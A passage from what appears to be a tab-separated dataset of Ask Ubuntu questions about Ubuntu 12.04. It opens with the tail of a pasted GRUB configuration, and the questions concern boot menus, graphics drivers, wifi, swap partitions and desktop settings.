' search -- no-floppy -- fs-uuid -- set=root 20cec6ca-4024-4237-84c3-d2ba3c851497 echo 'loading linux 3.2.0-25-generic-pae ... ' linux /boot/vmlinuz-3.2.0-25-generic-pae root=uuid=20cec6ca-4024-4237-84c3-d2ba3c851497 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.2.0-25-generic-pae } submenu `` previous linux versions '' { menuentry 'ubuntu , with linux 3.2.0-23-generic-pae ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 20cec6ca-4024-4237-84c3-d2ba3c851497 linux /boot/vmlinuz-3.2.0-23-generic-pae root=uuid=20cec6ca-4024-4237-84c3-d2ba3c851497 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.2.0-23-generic-pae } menuentry 'ubuntu , with linux 3.2.0-23-generic-pae ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 20cec6ca-4024-4237-84c3-d2ba3c851497 echo 'loading linux 3.2.0-23-generic-pae ... ' linux /boot/vmlinuz-3.2.0-23-generic-pae root=uuid=20cec6ca-4024-4237-84c3-d2ba3c851497 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.2.0-23-generic-pae } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 20cec6ca-4024-4237-84c3-d2ba3c851497 linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 20cec6ca-4024-4237-84c3-d2ba3c851497 linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry `` windows 7 ( loader ) ( on /dev/sda1 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 9014706714705268 chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # #
154832	can not boot to ubuntu , though installation was successful	i installed ubuntu 12.04 on an hp pavilion h8-1228 computer via usb flash drive . installation was a success . my computer still starts windows , but there is no way to boot to ubuntu . i tried hitting f5 to display a boot menu . there is no `` ubuntu '' option . how can i boot into newly my installed ubuntu system ?
154833	how to install & upgrade my video driver	one helpful folk during troubleshooting on virtualbox told me that my graphic driver is too old . 00:00:02.714 opengl info : render spu : gl_vendor : tungsten graphics , inc 00:00:02.714 opengl info : render spu : gl_renderer : mesa dri mobile intel速 gm45 express chipset x86/mmx/sse2 00:00:02.714 opengl info : render spu : gl_version : 2.1 mesa 8.0.2 trying to solve the problem , i referred this link . but now i do n't know how to proceed and what to download and how to install the latest driver for my video card . the graphic card was included in the purchase , so i think it is an integrated one . for more info here is my pci info generated by hardinfo : pci devices host bridge intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) vga compatible controller intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) ( prog-if 00 [ vga controller ] ) display controller intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) usb controller intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) ( prog-if 00 [ uhci ] ) usb controller intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 03 ) ( prog-if 00 [ uhci ] ) usb controller intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) ( prog-if 00 [ uhci ] ) usb controller intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) ( prog-if 20 [ ehci ] ) audio device intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) pci bridge intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) ( prog-if 00 [ normal decode ] ) pci bridge intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 03 ) ( prog-if 00 [ normal decode ] ) pci bridge intel corporation 82801i ( ich9 family ) pci express port 4 ( rev 03 ) ( prog-if 00 [ normal decode ] ) pci bridge intel corporation 82801i ( ich9 family ) pci express port 5 ( rev 03 ) ( prog-if 00 [ normal decode ] ) pci bridge intel corporation 82801i ( ich9 family ) pci express port 6 ( rev 03 ) ( prog-if 00 [ normal decode ] ) usb controller intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) ( prog-if 00 [ uhci ] ) usb controller intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) ( prog-if 00 [ uhci ] ) usb controller intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) ( prog-if 00 [ uhci ] ) usb controller intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) ( prog-if 20 [ ehci ] ) pci bridge intel corporation 82801 mobile pci bridge ( rev 93 ) ( prog-if 01 [ subtractive decode ] ) isa bridge intel corporation ich9m lpc interface controller ( rev 03 ) sata controller intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 4 port sata controller [ ahci mode ] ( rev 03 ) ( prog-if 01 [ ahci 1.0 ] ) smbus intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) ethernet controller realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) network controller atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) sd host controller ricoh co ltd mmc/sd host controller ( rev 01 ) system peripheral ricoh co ltd memory stick host controller ( rev 01 ) firewire ( ieee 1394 ) ricoh co ltd r5c832 pcie ieee 1394 controller ( rev 01 ) ( prog-if 10 [ ohci ] )
154834	unmet dependencies	! [ packages with unmet dependencies ] [ 1 ] this is on a machine with 12.04 . can someone help me with this please ? i ca n't open software center so i tried reinstalling it and i get the same message i get when i want to install wine . thank you .
154839	ubuntu installation got hanged	this is my first ever attempt at working with ubuntu . i only installed windows in the past.. i purchased new hardwares this week and i would really like to give ubuntu a chance ( especially since i do n't want to buy another windows license ) . the hardware specifications : processor : amd fx-8150 zambezi 3.6ghz socket am3+ 125w eight-core desktop processor motherboard : asus crosshair v formula am3+ amd 990fx sata 6gb/s usb 3.0 atx amd gaming motherboard hard disk 1 : samsung 830 series mz-7pc128d/am 2.5 '' 128gb sata iii mlc internal solid state drive ( ssd ) . this is my boot drive hard disk 2 : western digital velociraptor wd5000hhtz 500gb 10000 rpm sata 6.0gb/s 3.5 '' internal hard drive - this is a backup drive where i installed windows vista , until i can get ubuntu to work . memory : g.skill ripjaws x series 16gb ( 2x8gb ) 240-pin ddr3 sdram graphics card : asus hd7850-dc2-2gd5 radeon hd 7850 2gb 256-bit gddr5 pci express 3.0 x16 i have downloaded and tried to install both ubuntu 64 bit and kubuntu 64 bit ( both 12.04 ) . both always fail to copy a file during installation or get hanged during installation to ssd . i have burned two copies of ubuntu 12.04 and both cd failed i have installed vista on the hdd drive . is it possible to install the ubuntu on that drive ?
154851	how to fix the device names of usb storage devices ?	i would like to try building raid system using two or more usb drives for just an experiment . but , the device names of usb drives will be changed whenever they reput or the system reboot . for example : /dev/sdb changes to /dev/sdc etc . is there any good solution to fix the device names of usb drives ?
154852	do `` package '' and `` application/software/program '' mean the same thing ?	are these words used interchangeably in linux ?
154853	is there supposed to be a windows network folder in the file manager ?	i pulled my hard drive out of my computer and started with a bootable usb version of ubuntu , which i am using that at this point . at first boot , i see that there is a windows folder when browsing network . since there is no operating system present , besides the usb that i boot from , should there be a windows network folder ? original question first of all i just want to say , i wish i had tried ubuntu a couple years ago when i first heard about it , but i was like a lot of the population and went with the `` easy way '' and stuck with windows because i did n't want to take the time to learn something new . well , about 3 months ago i realized someone had hacked into my computer , and then found they had hacked my facebook account so i decided i had better do a complete credit check . i found student loans ( totalling about 30,000 so far ) had recently showed up on my credit report . i think it 's going to be a long , long road to recovery now but i 'm hoping ubuntu will be a start and definitely an eye opener . my relationship with windows is over . i had 3 antivirus programs running , none were protecting me like i thought they were . turned out a free program that i downloaded was the only one that could detect and clean the virus , but by then it was too late . anyhow , my question is , i pulled my hard drive out of my computer and started with a bootable usb version of ubuntu , which i am using that at this point . at first boot , i see that there is a windows folder when browsing network . since there is no operating system present , besides the usb that i boot from , should there be a windows network folder ? i am using a local isp ( and wo n't be much longer because i am very paranoid at this point ) and i want to make sure all is ok before i put my new hard drive in and install ubuntu . any help would be appreciated . also , i want to thank ubuntu and the community for giving people an alternative .
154855	how to get backup for particular ubuntu user ?	i lost my ubuntu root password and now , i just want to get it by doing changes on sudoers file but before this i would like to get backup of my working ubuntu user-profile due to safety purpose of data and software 's . does anybody know how to do it , if so please share the information .
154856	`` panic : early exception 08 rip 246:10 '' error with an nvidia 210g	i have a nvidia 210 graphics card and have gone in to text mode in ubuntu and disabled the standard driver and replaced it with the new driver i got from nvidia 's website . everything works fine but when the computer is off for more then a few hours , the next time i boot i get a weird error message : panic : early exception 08 rip 246:10 error at this point i have to take out my new card and drop in a 8500gt card , go back into text mode and re-install the drivers to get my new card to work again . this message even comes up if i try to go into recovery mode before re-installing the drivers . the 8500gt card i can pop-in at anytime and it works no problem with any nvidia driver installed . anyone have any clue why this is happening and what to do to fix it ? ? ? dell inspiron 530 intel core 2 quad 2.33ghz 3 gb mem 1tb hdd nvidia 210g or nvidia 8500gt pcie1
154858	ubuntu 12.04 , on an older dell dimension , with nvidia geforce fx 5200 - just not working !	i 'm very new to ubuntu . i wanted to move away from windows because i 've been learning python for the last year and wanted to be on an os that was good for python development . ubuntu and python are rather simpatico , hence the move . well , as you might guess from the title , i 've had a few issues involving the nvidia card . for one , i get a false positive gpu hang until i went and did this : i ran sudo nano /etc/defaults/apport . editing this file , i set enabled=0 . this eliminated the error message and allows me to use the computer . but beyond this , i have also never been able to get the ancient gpu and ubuntu to play nice . i 've tried two separate solutions , only to have the same thing happen both times ; an unbootable computer . i 've tried to : sudo apt-add-repository ppa : ubuntu-x-swat/x-updates & & sudo apt-get update & & sudo apt-get install nvidia-current i 've also attempted to install the .run packages for nividia-173 , and walking through the motions of killing the x server session and trying to install in this way , etc ... they both lead to the same black screen on start up . i get a momentary purple screen , then nothing . i 'm forced to restart with grub and when i do , slow computer is slow . the thing of it is , even when i go back and `` sudo apt-get purge '' all the non-working things , i still reboot to a splash screen , momentary ubuntu purple , and eventual black screen . so whatever it is that these drivers are going and doing once i let them snake in , they 're doing a good job of borking everything right up , because uninstalling does n't seem to matter one bit . now , i know i 'm doing all this on an older box . it 's a dell dimension 2400 , running a 2.4 ghz celeron processor and 1 gb ram , and i also know the graphics card is something of a dinosaur ( to compliment the prehistoric computer , of course ) . so i 'm willing to submit that maybe i 'm just asking too much of an old bird . i 'd post the exact specs , but i ca n't , because right now that computer is in the middle of the third re-install of ubuntu 12.04 in two weeks . i 've also seen the nvidia issue seems to be pretty well-traveled by now , and honestly there 's so much different information out there and varied results from the outcomes that honestly i do n't know what to try right now , except just leaving the blasted thing alone and running it without the drivers . the problem here is , i do n't know what i 'm supposed to know in order to troubleshoot this stuff , so i do n't rightly know the right questions to ask , but at this point i 'm wondering if i should just look into an older version of ubuntu . the computer was running windows xp until i decided to be bold and jump ship ; it was n't blazing fast , but it worked . and if my research and memory serve me correctly , this issue involving this particular configuration did n't pop up until , what , ubuntu 11 ? if i roll-back to try and correct this issue , am i doing it weird ? i have n't written but five lines of code since i started mucking around with my os . i did this so i could code more , not less . i 'm frustrated and sad and annoyed that my experience with non-proprietary operating systems has thus far been fraught with bad drivers , three reinstalls , and a steep learning curve . whatever advice the community has for me at this point , i 'm all ears here . edit : got the old girl up and running . here 's my lshw : description : space-saving computer product : dimension 2400 vendor : winbond electronics serial : g7tbr41 width : 32 bits capabilities : smbios-2.3 dmi-2.3 smp-1.4 smp configuration : administrator_password=enabled boot=normal chassis=space-saving cpus=1 power-on_password=enabled uuid=44454c4c-3700-1054-8042-c7c04f523431 *-core description : motherboard product : 0f5949 vendor : winbond electronics physical id : 0 version : a00 serial : ..cn70821436b0uu . *-firmware description : bios vendor : winbond electronics physical id : 0 version : a05 date : 12/02/2003 size : 64kib capacity : 448kib capabilities : pci pnp apm upgrade shadowing escd cdboot bootselect edd int13floppytoshiba int5printscreen int9keyboard int14serial int17printer acpi usb ls120boot biosbootspecification netboot *-cpu description : cpu product : intel ( r ) celeron ( r ) cpu 2.40ghz vendor : intel corp. physical id : 400 bus info : cpu @ 0 version : 15.2.9 slot : microprocessor size : 2400mhz capacity : 3600mhz width : 32 bits clock : 400mhz capabilities : boot fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe up pebs bts cid xtpr configuration : id=0 *-cache:0 description : l1 cache physical id : 700 size : 8kib capacity : 8kib capabilities : internal write-back data *-cache:1 description : l2 cache physical id : 701 size : 128kib capacity : 128kib capabilities : internal varies unified *-memory description : system memory physical id : 1000 slot : system board or motherboard size : 1gib capacity : 1gib *-bank:0 description : dimm sdram synchronous 266 mhz ( 3.8 ns ) physical id : 0 slot : dimm_1 size : 512mib width : 64 bits clock : 266mhz ( 3.8ns ) *-bank:1 description : dimm sdram synchronous 266 mhz ( 3.8 ns ) physical id : 1 slot : dimm_2 size : 512mib width : 64 bits clock : 266mhz ( 3.8ns ) *-pci description : host bridge product : 82845g/gl [ brookdale-g ] /ge/pe dram controller/host-hub interface vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 01 width : 32 bits clock : 33mhz configuration : driver=agpgart-intel resources : irq:0 memory : e8000000-efffffff *-display description : display controller product : 82845g/gl [ brookdale-g ] /ge chipset integrated graphics device vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : driver=i915 latency=0 resources : irq:16 memory : e0000000-e7ffffff memory : feb80000-febfffff *-usb:0 description : usb controller product : 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) usb uhci controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 01 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:16 ioport : ff80 ( size=32 ) *-usb:1 description : usb controller product : 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) usb uhci controller # 2 vendor : intel corporation physical id : 1d.1 bus info : pci @ 0000:00:1d.1 version : 01 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:19 ioport : ff60 ( size=32 ) *-usb:2 description : usb controller product : 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) usb uhci controller # 3 vendor : intel corporation physical id : 1d.2 bus info : pci @ 0000:00:1d.2 version : 01 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:18 ioport : ff40 ( size=32 ) *-usb:3 description : usb controller product : 82801db/dbm ( ich4/ich4-m ) usb2 ehci controller vendor : intel corporation physical id : 1d.7 bus info : pci @ 0000:00:1d.7 version : 01 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:23 memory : ffa80800-ffa80bff *-pci description : pci bridge product : 82801 pci bridge vendor : intel corporation physical id : 1e bus info : pci @ 0000:00:1e.0 version : 81 width : 32 bits clock : 33mhz capabilities : pci normal_decode bus_master resources : memory : fd000000-feafffff memory : f0000000-f7ffffff *-display description : vga compatible controller product : nv34 [ geforce fx 5200 ] vendor : nvidia corporation physical id : 4 bus info : pci @ 0000:01:04.0 version : a1 width : 32 bits clock : 66mhz capabilities : pm vga_controller bus_master cap_list rom configuration : driver=nouveau latency=64 maxlatency=1 mingnt=5 resources : irq:16 memory : fd000000-fdffffff memory : f0000000-f7ffffff memory : fea00000-fea1ffff *-network description : ethernet interface product : bcm4401 100base-t vendor : broadcom corporation physical id : 9 bus info : pci @ 0000:01:09.0 logical name : eth0 version : 01 serial : 00:0f:1f:47:3b:3a size : 100mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list rom ethernet physical mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=b44 driverversion=2.0 duplex=full ip=192.168.1.103 latency=64 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:17 memory : fe9fe000-fe9fffff memory : fe000000-fe003fff *-isa description : isa bridge product : 82801db/dbl ( ich4/ich4-l ) lpc interface bridge vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 01 width : 32 bits clock : 33mhz capabilities : isa bus_master configuration : latency=0 *-ide description : ide interface product : 82801db ( ich4 ) ide controller vendor : intel corporation physical id : 1f.1 bus info : pci @ 0000:00:1f.1 logical name : scsi0 logical name : scsi1 version : 01 width : 32 bits clock : 33mhz capabilities : ide bus_master emulated configuration : driver=ata_piix latency=0 resources : irq:18 ioport:1f0 ( size=8 ) ioport:3f6 ioport:170 ( size=8 ) ioport:376 ioport : ffa0 ( size=16 ) memory : feb7fc00-feb7ffff *-disk description : ata disk product : maxtor 6y080l0 vendor : maxtor physical id : 0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : yar4 serial : y2g69fqe size : 74gib ( 80gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=0007c431 *-volume:0 description : ext4 volume vendor : linux physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 logical name : / version : 1.0 serial : 4783b86d-db77-401b-84cd-7c263eee6cd9 size : 73gib capacity : 73gib capabilities : primary bootable journaled extended_attributes large_files huge_files dir_nlink recover extents ext4 ext2 initialized configuration : created=2012-06-22 22:45:10 filesystem=ext4 lastmountpoint=/ modified=2012-06-22 23:39:51 mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , user_xattr , barrier=1 , data=ordered mounted=2012-06-22 23:41:12 state=mounted *-volume:1 description : extended partition physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 size : 1020mib capacity : 1020mib capabilities : primary extended partitioned partitioned : extended *-logicalvolume description : linux swap / solaris partition physical id : 5 logical name : /dev/sda5 capacity : 1020mib capabilities : nofs *-cdrom description : scsi cd-rom physical id : 1 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/sr0 capabilities : audio configuration : status=nodisc *-serial unclaimed description : smbus product : 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 01 width : 32 bits clock : 33mhz configuration : latency=0 resources : ioport : eda0 ( size=32 ) *-multimedia description : multimedia audio controller product : 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) ac'97 audio controller vendor : intel corporation physical id : 1f.5 bus info : pci @ 0000:00:1f.5 version : 01 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : driver=snd_intel8x0 latency=0 resources : irq:17 ioport : ee00 ( size=256 ) ioport : edc0 ( size=64 ) memory : feb7fa00-feb7fbff memory : feb7f900-feb7f9ff hope that helps to make a proper assessment..
154860	how to install intel graphics for dell inspiron 1545 laptop	whenever i start any game ( e.g . max payne 2 ) , a message like `` install your video card drivers '' . my laptop configuration is : dell inspiron 1545 os : ubuntu 12.04 processor : intel core2 duo t6400 15.6 wled display ( 1366x768 ) please tell me the way to install intel graphics for ubuntu 12.04 on dell inspiron 1545 laptop ... .
154879	black screen with mouse pointer after resuming from suspend ( from time to time )	from time to time ( probably every 4th or 5th , or when it 's been a long time ) suspend fails to resume properly on my machine . when raising the lid i always get a second or so of terminal text before i get to the log in screen and can input my fingerprint . from time to time the terminal text lasts maybe two seconds ( not a lot but just noticeable ) and i know i wo n't resume properly . i get a black screen with just the mouse pointer . the mouse moves and reacts to the underlying elements ( text input field and buttons ) . there is no use in trying to log in . it works but screen is as black and no work can be done . i have tried using another tty ctrl+alt+f1 and commands like compiz -- replace , compiz , unity -- replace , unity and so on . when writing unity and moving back to tty7 i get the login box for a couple of seconds before the only thing left on the screen is my background . if i 've logged in before switching tty i actually see my windows for a couple of seconds when writing unity and moving back , but without any window chrome and then just the background . i always just end up restarting x with alt+print scrn+k . this is a thinkpad t420s with intel hd 3000 integrated graphics and ubuntu 12.04 . i did not experience the problem for the two or so months i used 11.10 . i 'm also pretty sure that this did n't appear just after installing 12.04 . i would like help to figuring out what causes this and how to fix it . i do n't know what logs to provide or what other info would be relevant so just tell me and i 'll try my best to find them .
154880	how to disable/enable automatically connecting to wifi ?	whenever i restart my wifi router , ubuntu tries to connect to my neighbours ' wifi networks . there 's over 30 wireless networks in the area . ubuntu prompts me for the password to all of those . this is annoying . is there a way to stop ubuntu trying to automatically connect to wifi networks ?
154896	windows android sdk packages in linux	can i use the android sdk packages ( both the images for emulator and the sdk patform for ics ) in a ubuntu android sdk directory . this is in effect to the large download size of the packages which i dont want to download again . will simply copying those packages and images to the linux android-sdk-linux directory do the work ?
154897	how to update dropbox in xubuntu 12.04 ?	i tried to find a way to update my dropbox installation but none of the solutions i found on internet work . my system is xubuntu 12.04 and has dropbox 1.4.0 installed . the .deb file on the dropbox web site is the same version .
154899	virtualbox crashing when run through optirun ( virtualgl )	i have followed the virtualgl documentation to run virtualbox through virtualgl . my goal is to use the discrete nvidia card in my laptop via optirun ( bumblebee ) , which uses virtualgl to do this . attempting it has consistantly caused virtualbox to crash , as it ca n't find a graphics card . anyone knowledgeable about this ?
154900	access from anywhere in the world ?	how can i acess to ubuntu 12.04 lts with ssh and vnc from anywhere in the world with a wifi connection ? i found this application , but can this app access my ubuntu system from anywhere in the world ?
154901	how to use gdk with quickly	i trying to use the library gdk for scale down an image and apply it to a gdkimage . this is the code pixbuf = gdk.pixbuf_new_from_file ( filename ) pixbuf = pixbuf.scale_simple ( 100 , 100 , gdk.interp_bilinear ) the problem is that python ca n't find gdk even if i use everything in lowercase error : pixbuf = gdk.pixbuf_new_from_file ( filename ) nameerror : global name 'gdk ' is not defined i do n't know what should i do because i tried to import gdk but nothing is changed
154906	which default.list should i modify for default applications and what are the differences between the two ?	i would like to add miro to the default application gui in system settings/default applications . i added ; miro.desktopnext to all rhythmbox.desktop entries eventually discovering if it was not added to audio/x-vorbis+ogg=rhythmbox.desktop as audio/x-vorbis+ogg=rhythmbox.desktop ; miro.desktop it would not appear in the system settings/default applications drop down list for audio . i can find default.list in either /etc/gnome/defaults.list or /usr/share/applications/defaults.list modifying either gives me the same results . further reading and i found that gnome splits the settings for default application in system-wide and user specific settings . system wide application assignments can be found in /etc/gnome/defaults.list . user specific files are located in ~/.local/share/applications . so i understand that if i right click/open with/set as default it will make changes to my .local/share/applications/mimeapps.list and will be associated with that user.i suppose i could even create a defaults.list in .local/share/applications/ but since both changes made in /usr/share/applications/defaults.list and /etc/gnome/defaults.list are system wide im not sure which is the correct way.what is the difference between the two and which is the correct list to modify ?
154912	gnome3.4 looks like old gnome	i set up a complete new ubuntu 12.04 lts . on this i installed gnome 3.4 from official gnome website at first it looked very well , like the screenshots on the website . but since 2nd restart my desktop looks like in ubuntu 10 ... what to do ? update : after complete new installing ubuntu 12.04 i watched step by step when `` new '' gnome look dissappears . so i found out that when i start nvidia xserver settings first time & set my 2nd screen ( hdmi port ) from inactive to active , gnome jumps to old style , exactly as in gerrys screenshot . i deactivated it again , saved this to /etc/x11/xorg.conf again . but gnome stays in old look . so i assume its something with this stuff . i am using nvidia geforce gt 530 & `` accelerated graphics driver version current '' ( hope , i translated correct ) thanks for you help so far , hope you can solve this problem ...
154916	thinkpad x220 wireless network slows down after some time	i installed ubuntu 12.04 lts on my thinkpad x220 . when i connect to a wireless network , the network speed starts out normal . but after a certain period of time ( say , 10 minutes ) , the network speed progressively slows down . eventually it disconnects completely , and i can not even ping the router . why could this be happening ? i have only had this problem with 12.04 .
154917	no boot option after installing ubuntu 12.04 lts on acer aspire 4736z with live cd	i am facing a problem . after installing ubuntu 12.04 lts using live cd , at the reboot there is no boot option to choose the os . i directly get logged into my windows 7 . before that i was having an issue with the 'nomodeset ' if not mistaken .after ticking [ x ] on the nomodeset , i can install my ubuntu , but got stucked again at choosing the partition option . so i did 2 partitions for ubuntu , 1 partition as ext3 for / and the other 1 for swap . which enabled to proceed until the finished installation dialogue , and after that system wants to reboot .it takes some time and gets stuck at the screen doing nothing , does n't reboot at all . i did forced shutdown then rebooted again which directly logs me in windows 7 without boot option . in win7 the partitions for ubuntu is gone . i tried the boot-repair thing and it does n't help .it just shows up the _ blank cursor ( terminal thing i guess ) . i typed boot repair but still the same result . i am using acer aspire 4736z . please somebody help me with this issue .
154918	how can i change font attributes for `` text entry '' in glade	i 'd like to change font attributes ( size , style , family , colour ) for text entry but i do n't see any option for this in glade . there 's no problem with label , but label is not editable by user . i tried to edit the myappnamewindow.ui file in gedit and copied attributes from label to text entry but after that the app does not start .
154921	how do i get ubuntu 12.04 to recognize encrypted swap partition so that i can hibernate ?	i just installed ubuntu 12.04 and used gparted to erase and enlarge my swap partition . when i rebooted , gparted said that the file partition for the swap was unknown . gparted does n't let me change the file partition to `` linux-swap '' . it does let me change it to ntfs , but when i reboot , it goes back to `` unknown '' . thanks in advance for your help . output from sudo swapon -s : filename type size used priority /dev/mapper/cryptswap1 partition 9025532 0 -1 output from sudo fdisk -l : disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x9d63ac84 device boot start end blocks id system /dev/sda1 * 2048 2459647 1228800 7 hpfs/ntfs/exfat /dev/sda2 2459648 197836472 97688412+ 7 hpfs/ntfs/exfat /dev/sda3 466890752 488395119 10752184 7 hpfs/ntfs/exfat /dev/sda4 197836798 466890751 134526977 5 extended /dev/sda5 197836800 448837631 125500416 83 linux /dev/sda6 448839680 466890751 9025536 82 linux swap / solaris partition table entries are not in disk order disk /dev/mapper/cryptswap1 : 9242 mb , 9242148864 bytes 255 heads , 63 sectors/track , 1123 cylinders , total 18051072 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x951b7f53 disk /dev/mapper/cryptswap1 does n't contain a valid partition table
154922	what book-library organizing programs are available ?	i would like to ask if there is any good program for ubuntu 12.04 to organize a library of books.i want to mention that i also have books written in my native language ( greek ) and i have books written in other languages like english , french , etc too .so basically i need an application which can fetch information from databases for greek books . for example - adding a greek ( isbn ) book database source and when i type the isbn of the book in the program , it should find the book from that databases . is this possible ? i already tried tellico and gcstar but they were unable to find books with greek isbn .i tried to add a greek book source but it was n't successful .
154926	can i use closed source application for artworks or icon in my application for the showdown ?	i want to develop an application for `` ubuntu app showdown '' . can i use closed source application for artworks or icons ? like corel or photoshop or etc . ( what if i use them with winehq in ubuntu ? )
154929	how to use second and 3rd partitions in ubuntu	how i can use second and 3rd partitions in ubuntu through terminal as path like : /home/usr etc ... i have 3 partions 1st windows ( ntfs ) , 2nd shared ( fat ) , 3rd ubuntu ( ext4 ) . what should i type in the terminal to access files of 2nd partition
154931	can no longer position windows with keyboard ( compiz grid feature broken )	problem description the compiz grid feature just stopped working a couple of days ago : for instance i used to be able to move a terminal window to the top left corner by pressing < ctrl > < alt > kp7 but now the number 7 appears in the terminal and the window does n't move . troubleshooting -compiz grid is enabled and i have restored its configuration to the default values -my numpad is working properly ( i.e . if it 's locked i get the numbers , if not i get home , ins , del ... as expected ) . -i looked into the keyboard and keyboard layout settings but i do n't see any option i could tweak to fix the problem . what do i need to do in order to restore the compiz grid feature ?
154934	ubuntustudio 12.04 does not boot after install - no `` intrd '' image	after installing ubuntu studio 12.04 from dvd onto the fourth hard disk , it fails to boot , even when explicitly choosing the fourth hard disk as the boot device . i have suse 11.2 on the first 2 scsi disks ( which form a raid ) and studio64 on the 1st ide disk ( that is , the third disk ) . looking at the /boot directory on the ubuntu partition , i see there is no initrd image . editing the grub configuration file to include ( hd3,1 ) /vmlinuz and of course ( hd3,1 ) /initrd should fix the problem . but still grub gives a file not found error . this appears to me that , no mkintrd during the booting process ( checked with livecd ) runs like in opensuse . how do i create the initrd to make ubuntu bootable .
154938	how do i get images to appear on buttons in glade designer ?	not sure if this is a bug or just a very annoying feature , but i ca n't get an image to appear on any of my buttons in glade designer . is there some property i need to change in order to force it to display the image ?
154939	missing icons in gnome shell	symbols are missing in the settings menu . how can i fix this ?
